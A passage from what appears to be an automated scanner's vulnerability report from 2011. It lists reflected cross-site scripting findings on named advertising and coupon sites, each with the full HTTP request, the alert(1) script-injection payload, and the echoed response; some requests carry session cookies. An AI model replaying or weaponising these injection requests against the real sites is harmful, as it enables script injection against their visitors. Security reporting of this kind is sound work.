Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 14 Nov 2011 19:04:52 GMT
Date: Mon, 31 Oct 2011 19:04:52 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"3f385<script>alert(1)</script>943c461294", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.29. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 3b297<script>alert(1)</script>70c3d1f0ea5 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=3b297<script>alert(1)</script>70c3d1f0ea5&c6=&c15=&tm=240654 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 14 Nov 2011 19:04:53 GMT
Date: Mon, 31 Oct 2011 19:04:53 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"3b297<script>alert(1)</script>70c3d1f0ea5", c6:"", c10:"", c15:"", c16:"", r:""});



3.30. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 7bd68<script>alert(1)</script>202b4b7f415 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=7bd68<script>alert(1)</script>202b4b7f415&c15=&tm=240654 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 14 Nov 2011 19:04:54 GMT
Date: Mon, 31 Oct 2011 19:04:54 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"7bd68<script>alert(1)</script>202b4b7f415", c10:"", c15:"", c16:"", r:""});



3.31. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 76a4e<script>alert(1)</script>c98d370326b was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerId=309045726001 HTTP/1.1
Host: c.brightcove.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://admin.brightcove.com/viewer/us20111031.1743/federatedVideoUI/BrightcovePlayer.swf
Content-type: application/x-amf
Content-Length: 506

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q8a55a82739fb58246a53844b649d6fe5c5e225a5
cccom.brightcove.experience.ViewerExperienceRequest.experienceId.de
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Tue, 01 Nov 2011 01:30:42 GMT
Server:
Content-Length: 5078

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
A.9.e....eAQ~~,AAAAAETmrZQ~,EVFEM4AKJdT-Wv9cQWadwt8FUbtX2ID_.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO..mediaId.componentRefId.playerId    type.mediaDTO
..Br6..M...ivideoPlayer76a4e<script>alert(1)</script>c98d370326b..........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription
...[SNIP]...

3.32. http://cdn.w55c.net/i/0RX1mACGyl_437413582.html [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RX1mACGyl_437413582.html

Issue detail

The value of the ci request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f249"><script>alert(1)</script>9d0a7ef868d was submitted in the ci parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RX1mACGyl_437413582.html?&rtbhost=rts-rr19.sldc.dataxu.net&btid=OGMwMmFmNGEtN2IxMC00NGIwLWJkZmMtNTNjMWVlNzM4NzcxfE9GVXk4Y1owekF8MTMyMDExMzg4MjQzNnwxfDBGTXVtU0ZwSFp8MFJYMW1BQ0d5bHwwYWRmMjc4YS01Yzg0LTRlMDEtOGQ0ZS0wMGU5YjNjODVlYTF8MjY2ODgyfDE0MDAwMHw0MC4wfDA&ei=OPENX&wp_exchange=AAABM1zrRnX1_dFqhlWg4Gfo49TdjP-pKStRig&js=0&ob=1&ccw=SUFCMTEjMC4xNzAyNzY3fElBQjEyIzAuMTUxNTk3NjM&ci=0CV8fZRXhA1f249"><script>alert(1)</script>9d0a7ef868d&s=http%3A%2F%2Fwww.politico.com%2F&ts=1320113882462&geo=VVN8VFh8NjIzfDc1MjA3fA&rnd=2418593018510186&l=fGVufA&v=0&epid=T1g1NzAx&euid=ZjcxZmQzZDktZTYwMC1jYmNkLTFlNGQtZTQ0MjQ2YWU3NWJl&refurl=aHR0cDovL21lZGlhc2VydmljZXMtZC5vcGVueGVudGVycHJpc2UuY29tL3cvMS4wL2Fmcj9hdWlkPTM2ODIzJmNiPUlOU0VSVF9SQU5ET01fTlVNQkVSX0hFUkUmcmQ9NjAmcm09MjUmcmM9Mw HTTP/1.1
Host: cdn.w55c.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36823&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&rc=4
Cookie: wfivefivec=0adf278a-5c84-4e01-8d4e-00e9b3c85ea1; optout=1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 02:18:45 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=0adf278a-5c84-4e01-8d4e-00e9b3c85ea1;Path=/;Domain=.w55c.net;Expires=Thu, 31-Oct-13 02:18:45 GMT
Cache-Control: no-store
pragma: no-cache
Content-Type: text/html;charset=ISO-8859-1
Via: 1.1 ttn061008 (MII-APC/2.1)
Content-Length: 377

<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=810249"></IFRAME><br/>
<script type="text/javascript" src="http://cti.w55c.net/ct/creative_add_on.js?w=300&h=250&pos=top-right&zindex=0&ci=0CV8fZRXhA1f249"><script>alert(1)</script>9d0a7ef868d&ei=OPENX&ob=1">
...[SNIP]...

3.33. http://cdn.w55c.net/i/0RX1mACGyl_437413582.html [ei parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RX1mACGyl_437413582.html

Issue detail

The value of the ei request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28f54"><script>alert(1)</script>846dc866363 was submitted in the ei parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RX1mACGyl_437413582.html?&rtbhost=rts-rr19.sldc.dataxu.net&btid=OGMwMmFmNGEtN2IxMC00NGIwLWJkZmMtNTNjMWVlNzM4NzcxfE9GVXk4Y1owekF8MTMyMDExMzg4MjQzNnwxfDBGTXVtU0ZwSFp8MFJYMW1BQ0d5bHwwYWRmMjc4YS01Yzg0LTRlMDEtOGQ0ZS0wMGU5YjNjODVlYTF8MjY2ODgyfDE0MDAwMHw0MC4wfDA&ei=OPENX28f54"><script>alert(1)</script>846dc866363&wp_exchange=AAABM1zrRnX1_dFqhlWg4Gfo49TdjP-pKStRig&js=0&ob=1&ccw=SUFCMTEjMC4xNzAyNzY3fElBQjEyIzAuMTUxNTk3NjM&ci=0CV8fZRXhA&s=http%3A%2F%2Fwww.politico.com%2F&ts=1320113882462&geo=VVN8VFh8NjIzfDc1MjA3fA&rnd=2418593018510186&l=fGVufA&v=0&epid=T1g1NzAx&euid=ZjcxZmQzZDktZTYwMC1jYmNkLTFlNGQtZTQ0MjQ2YWU3NWJl&refurl=aHR0cDovL21lZGlhc2VydmljZXMtZC5vcGVueGVudGVycHJpc2UuY29tL3cvMS4wL2Fmcj9hdWlkPTM2ODIzJmNiPUlOU0VSVF9SQU5ET01fTlVNQkVSX0hFUkUmcmQ9NjAmcm09MjUmcmM9Mw HTTP/1.1
Host: cdn.w55c.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36823&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&rc=4
Cookie: wfivefivec=0adf278a-5c84-4e01-8d4e-00e9b3c85ea1; optout=1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 02:18:33 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=0adf278a-5c84-4e01-8d4e-00e9b3c85ea1;Path=/;Domain=.w55c.net;Expires=Thu, 31-Oct-13 02:18:33 GMT
Cache-Control: no-store
pragma: no-cache
Content-Type: text/html;charset=ISO-8859-1
Via: 1.1 ttn161181010000 (MII-APC/2.1)
Content-Length: 377

<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=810249"></IFRAME><br/>
<script type="text/javascript" src="http://cti.w55c.net/ct/creative_add_on.js?w=300&h=250&pos=top-right&zindex=0&ci=0CV8fZRXhA&ei=OPENX28f54"><script>alert(1)</script>846dc866363&ob=1">
...[SNIP]...

3.34. http://cdn.w55c.net/i/0RX1mACGyl_437413582.html [ob parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RX1mACGyl_437413582.html

Issue detail

The value of the ob request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e929"><script>alert(1)</script>558d47ebcdd was submitted in the ob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RX1mACGyl_437413582.html?&rtbhost=rts-rr19.sldc.dataxu.net&btid=OGMwMmFmNGEtN2IxMC00NGIwLWJkZmMtNTNjMWVlNzM4NzcxfE9GVXk4Y1owekF8MTMyMDExMzg4MjQzNnwxfDBGTXVtU0ZwSFp8MFJYMW1BQ0d5bHwwYWRmMjc4YS01Yzg0LTRlMDEtOGQ0ZS0wMGU5YjNjODVlYTF8MjY2ODgyfDE0MDAwMHw0MC4wfDA&ei=OPENX&wp_exchange=AAABM1zrRnX1_dFqhlWg4Gfo49TdjP-pKStRig&js=0&ob=13e929"><script>alert(1)</script>558d47ebcdd&ccw=SUFCMTEjMC4xNzAyNzY3fElBQjEyIzAuMTUxNTk3NjM&ci=0CV8fZRXhA&s=http%3A%2F%2Fwww.politico.com%2F&ts=1320113882462&geo=VVN8VFh8NjIzfDc1MjA3fA&rnd=2418593018510186&l=fGVufA&v=0&epid=T1g1NzAx&euid=ZjcxZmQzZDktZTYwMC1jYmNkLTFlNGQtZTQ0MjQ2YWU3NWJl&refurl=aHR0cDovL21lZGlhc2VydmljZXMtZC5vcGVueGVudGVycHJpc2UuY29tL3cvMS4wL2Fmcj9hdWlkPTM2ODIzJmNiPUlOU0VSVF9SQU5ET01fTlVNQkVSX0hFUkUmcmQ9NjAmcm09MjUmcmM9Mw HTTP/1.1
Host: cdn.w55c.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36823&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&rc=4
Cookie: wfivefivec=0adf278a-5c84-4e01-8d4e-00e9b3c85ea1; optout=1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 02:18:40 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=0adf278a-5c84-4e01-8d4e-00e9b3c85ea1;Path=/;Domain=.w55c.net;Expires=Thu, 31-Oct-13 02:18:40 GMT
Cache-Control: no-store
pragma: no-cache
Content-Type: text/html;charset=ISO-8859-1
Via: 1.1 ttn161182010000 (MII-APC/2.1)
Content-Length: 377

<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=810249"></IFRAME><br/>
<script type="text/javascript" src="http://cti.w55c.net/ct/creative_add_on.js?w=300&h=250&pos=top-right&zindex=0&ci=0CV8fZRXhA&ei=OPENX&ob=13e929"><script>alert(1)</script>558d47ebcdd">
...[SNIP]...

3.35. http://connexity.net/c/cse [E parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://connexity.net
Path:   /c/cse

Issue detail

The value of the E request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7e5e'%3balert(1)//5cf0b169852 was submitted in the E parameter. This input was echoed as a7e5e';alert(1)//5cf0b169852 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/cse?a=J&b=559602&E=a7e5e'%3balert(1)//5cf0b169852&F=1&H=90&J=http%3A%2F%2Fwww.politico.com%2Findex.html&L=&S=15&V=2&W=728 HTTP/1.1
Host: connexity.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html

Response

HTTP/1.1 200 OK
Server: Connexity
Date: Tue, 01 Nov 2011 01:36:58 GMT
Content-Type: text/html
Connection: keep-alive
P3P: CP="CAO PSA OUR",an.pp="http://www.connexity.com/privacy",an.oo="http://www.connexity.com/privacy",an.bt="N"
Set-Cookie: u=e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137; Expires=Sun, 30-Oct-2016 01:36:58 GMT; domain=connexity.net; path=/
Cache-Control: no-store, proxy-revalidate, no-cache="set-cookie", max-age=-1, post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Length: 6974

<!-- iframe-pre-script.inc.html -->
<html><head>
<script type="text/javascript">var startstamp = new Date();var timestamps = [];function sw(label){timestamps.push([label,new Date()]);}</script><script type="text/javascript">
var sid='15';
var fid='1';
var width=728;
var height=90;
var tid='0-3fd05f20';
var loadtest=false;
var nextOp = 'I';
var TPC='a7e5e';alert(1)//5cf0b169852';
var lsoAllowed=false;
var lsoRefresh=true;
var flashSupported=true;
var optOutPresent=false;
var UID='e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137';
var cdn_root='t.cxt.ms/';
var cse_ro
...[SNIP]...

3.36. http://connexity.net/c/cse [J parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://connexity.net
Path:   /c/cse

Issue detail

The value of the J request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2db3'%3balert(1)//e59c7adcdb7 was submitted in the J parameter. This input was echoed as d2db3';alert(1)//e59c7adcdb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/cse?a=J&b=559602&E=&F=1&H=90&J=http%3A%2F%2Fwww.politico.com%2Findex.htmld2db3'%3balert(1)//e59c7adcdb7&L=&S=15&V=2&W=728 HTTP/1.1
Host: connexity.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html

Response

HTTP/1.1 200 OK
Server: Connexity
Date: Tue, 01 Nov 2011 01:36:59 GMT
Content-Type: text/html
Connection: keep-alive
P3P: CP="CAO PSA OUR",an.pp="http://www.connexity.com/privacy",an.oo="http://www.connexity.com/privacy",an.bt="N"
Set-Cookie: u=e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137; Expires=Sun, 30-Oct-2016 01:36:59 GMT; domain=connexity.net; path=/
Cache-Control: no-store, proxy-revalidate, no-cache="set-cookie", max-age=-1, post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Length: 6976

<!-- iframe-pre-script.inc.html -->
<html><head>
<script type="text/javascript">var startstamp = new Date();var timestamps = [];function sw(label){timestamps.push([label,new Date()]);}</script><scri
...[SNIP]...
UID='e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137';
var cdn_root='t.cxt.ms/';
var cse_root='connexity.net/c/cse';
var ssl=false;
var ref='empty';
var refr='http://www.politico.com/index.htmld2db3';alert(1)//e59c7adcdb7';
</script>
...[SNIP]...

3.37. http://connexity.net/c/cse [L parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://connexity.net
Path:   /c/cse

Issue detail

The value of the L request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8753f'%3balert(1)//024f217ec36 was submitted in the L parameter. This input was echoed as 8753f';alert(1)//024f217ec36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/cse?a=J&b=559602&E=&F=1&H=90&J=http%3A%2F%2Fwww.politico.com%2Findex.html&L=8753f'%3balert(1)//024f217ec36&S=15&V=2&W=728 HTTP/1.1
Host: connexity.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html

Response

HTTP/1.1 200 OK
Server: Connexity
Date: Tue, 01 Nov 2011 01:36:59 GMT
Content-Type: text/html
Connection: keep-alive
P3P: CP="CAO PSA OUR",an.pp="http://www.connexity.com/privacy",an.oo="http://www.connexity.com/privacy",an.bt="N"
Set-Cookie: u=e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137; Expires=Sun, 30-Oct-2016 01:36:59 GMT; domain=connexity.net; path=/
Cache-Control: no-store, proxy-revalidate, no-cache="set-cookie", max-age=-1, post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Length: 6971

<!-- iframe-pre-script.inc.html -->
<html><head>
<script type="text/javascript">var startstamp = new Date();var timestamps = [];function sw(label){timestamps.push([label,new Date()]);}</script><scri
...[SNIP]...
flashSupported=true;
var optOutPresent=false;
var UID='e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137';
var cdn_root='t.cxt.ms/';
var cse_root='connexity.net/c/cse';
var ssl=false;
var ref='8753f';alert(1)//024f217ec36';
var refr='http://www.politico.com/index.html';
</script>
...[SNIP]...

3.38. http://couponbar.coupons.com/adblob.asp [AdSize parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://couponbar.coupons.com
Path:   /adblob.asp

Issue detail

The value of the AdSize request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12a72'%3balert(1)//0adbbbb611e was submitted in the AdSize parameter. This input was echoed as 12a72';alert(1)//0adbbbb611e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adblob.asp?AdSize=160x21012a72'%3balert(1)//0adbbbb611e&pzn=13306iq3710&req=1320087850320&zip=&did=&spage=.com/&npage=1 HTTP/1.1
Host: couponbar.coupons.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/
Cookie: UserInfo=mac=H&uid=H&acc=EASRMUBAA&isPrinterSupported=0&groupid=0%2C0%2C0&nid=H&ZIP=&rememberMeCookie=0&UserKey=%2Fh%2FDs1ZHTOB%2BrsASEvi1T8OW%2FL9Hb09kTHVDJEZyT21NYU5pQ2tB&cbStatus=0&isInitialSSOReg=0&euid=&appid=&redirectToLamp=0; SessionInfo=TrackingID=ALK10311204081DC0CB6203106106&SI=iG0O=Fwb!hWWGW_iAGnzERqwKPofIpMqfJf:|:@OZAq=O:|:T~lmga.OD=%:|:H9VZRP83=A:|:kG~ws8_=C:|:JIC^=K:|:PUK3SCG5pQ=e$:|:TDz%^YEZA=h6:|:Q!f=g:|:9XV=w!sHZap__Upbti.6_MpIZuJ5XjWdv5:|:9.tYWSpol!94~raTNO%=o:|:M5eyS%%_=_:|:PS.=l:|:PNd1sDF$ARB=44:|:ftCBkH=$:|:nXLojpd=7:|:n1AH3a=B:|:7BP9te1=z:|:MBIAkBF=_:|:hIJ7=W:|:%~Y@t4r.0=f:|:F@E%^=NU.4Jf&sC=yxzLLsYRc=fJ:|:glc_dul5jyE~8=D1:|:63ihezy%~F=0%b/3O/csZPPsJ4o; __utma=94333583.1002706944.1320087848.1320087848.1320087848.1; __utmb=94333583.3.9.1320087848; __utmc=94333583; __utmz=94333583.1320087848.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 31 Oct 2011 19:04:17 GMT
Server: Microsoft-IIS/6.0
p3p: CP="ALL DSP COR LAW CURa ADMa DEVa TAIa IVAi CONi OUR BUS IND PHY ONL COM NAV DEM OTC"
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 895
Content-Type: text/html
Expires: Mon, 31 Oct 2011 19:03:17 GMT
Cache-control: no-cache
CI_SVR_ID: 11/69
Set-Cookie: NSC_DpvqpoCbs-IUUQ=ffffffff0916155445525d5f4f58455e445a4a423660;expires=Mon, 31-Oct-2011 19:14:17 GMT;path=/;httponly

<html><head>
<title>Coupons.com</title>
</head>
<body topmargin='0' leftmargin='0' marginheight='0' marginwidth='0'>
<SCRIPT TYPE='text/javascript'>document.write('<!-- BEGIN STANDARD TAG - 160 x 21012a72';alert(1)//0adbbbb611e - SITE CODE REQUIRED : SECTION CODE REQUIRED - DO NOT MODIFY -->
...[SNIP]...

3.39. http://couponbar.coupons.com/adblob.asp [npage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://couponbar.coupons.com
Path:   /adblob.asp

Issue detail

The value of the npage request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 783ab'%3balert(1)//16595f62d8f was submitted in the npage parameter. This input was echoed as 783ab';alert(1)//16595f62d8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adblob.asp?AdSize=160x210&pzn=13306iq3710&req=1320087850320&zip=&did=&spage=.com/&npage=1783ab'%3balert(1)//16595f62d8f HTTP/1.1
Host: couponbar.coupons.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/
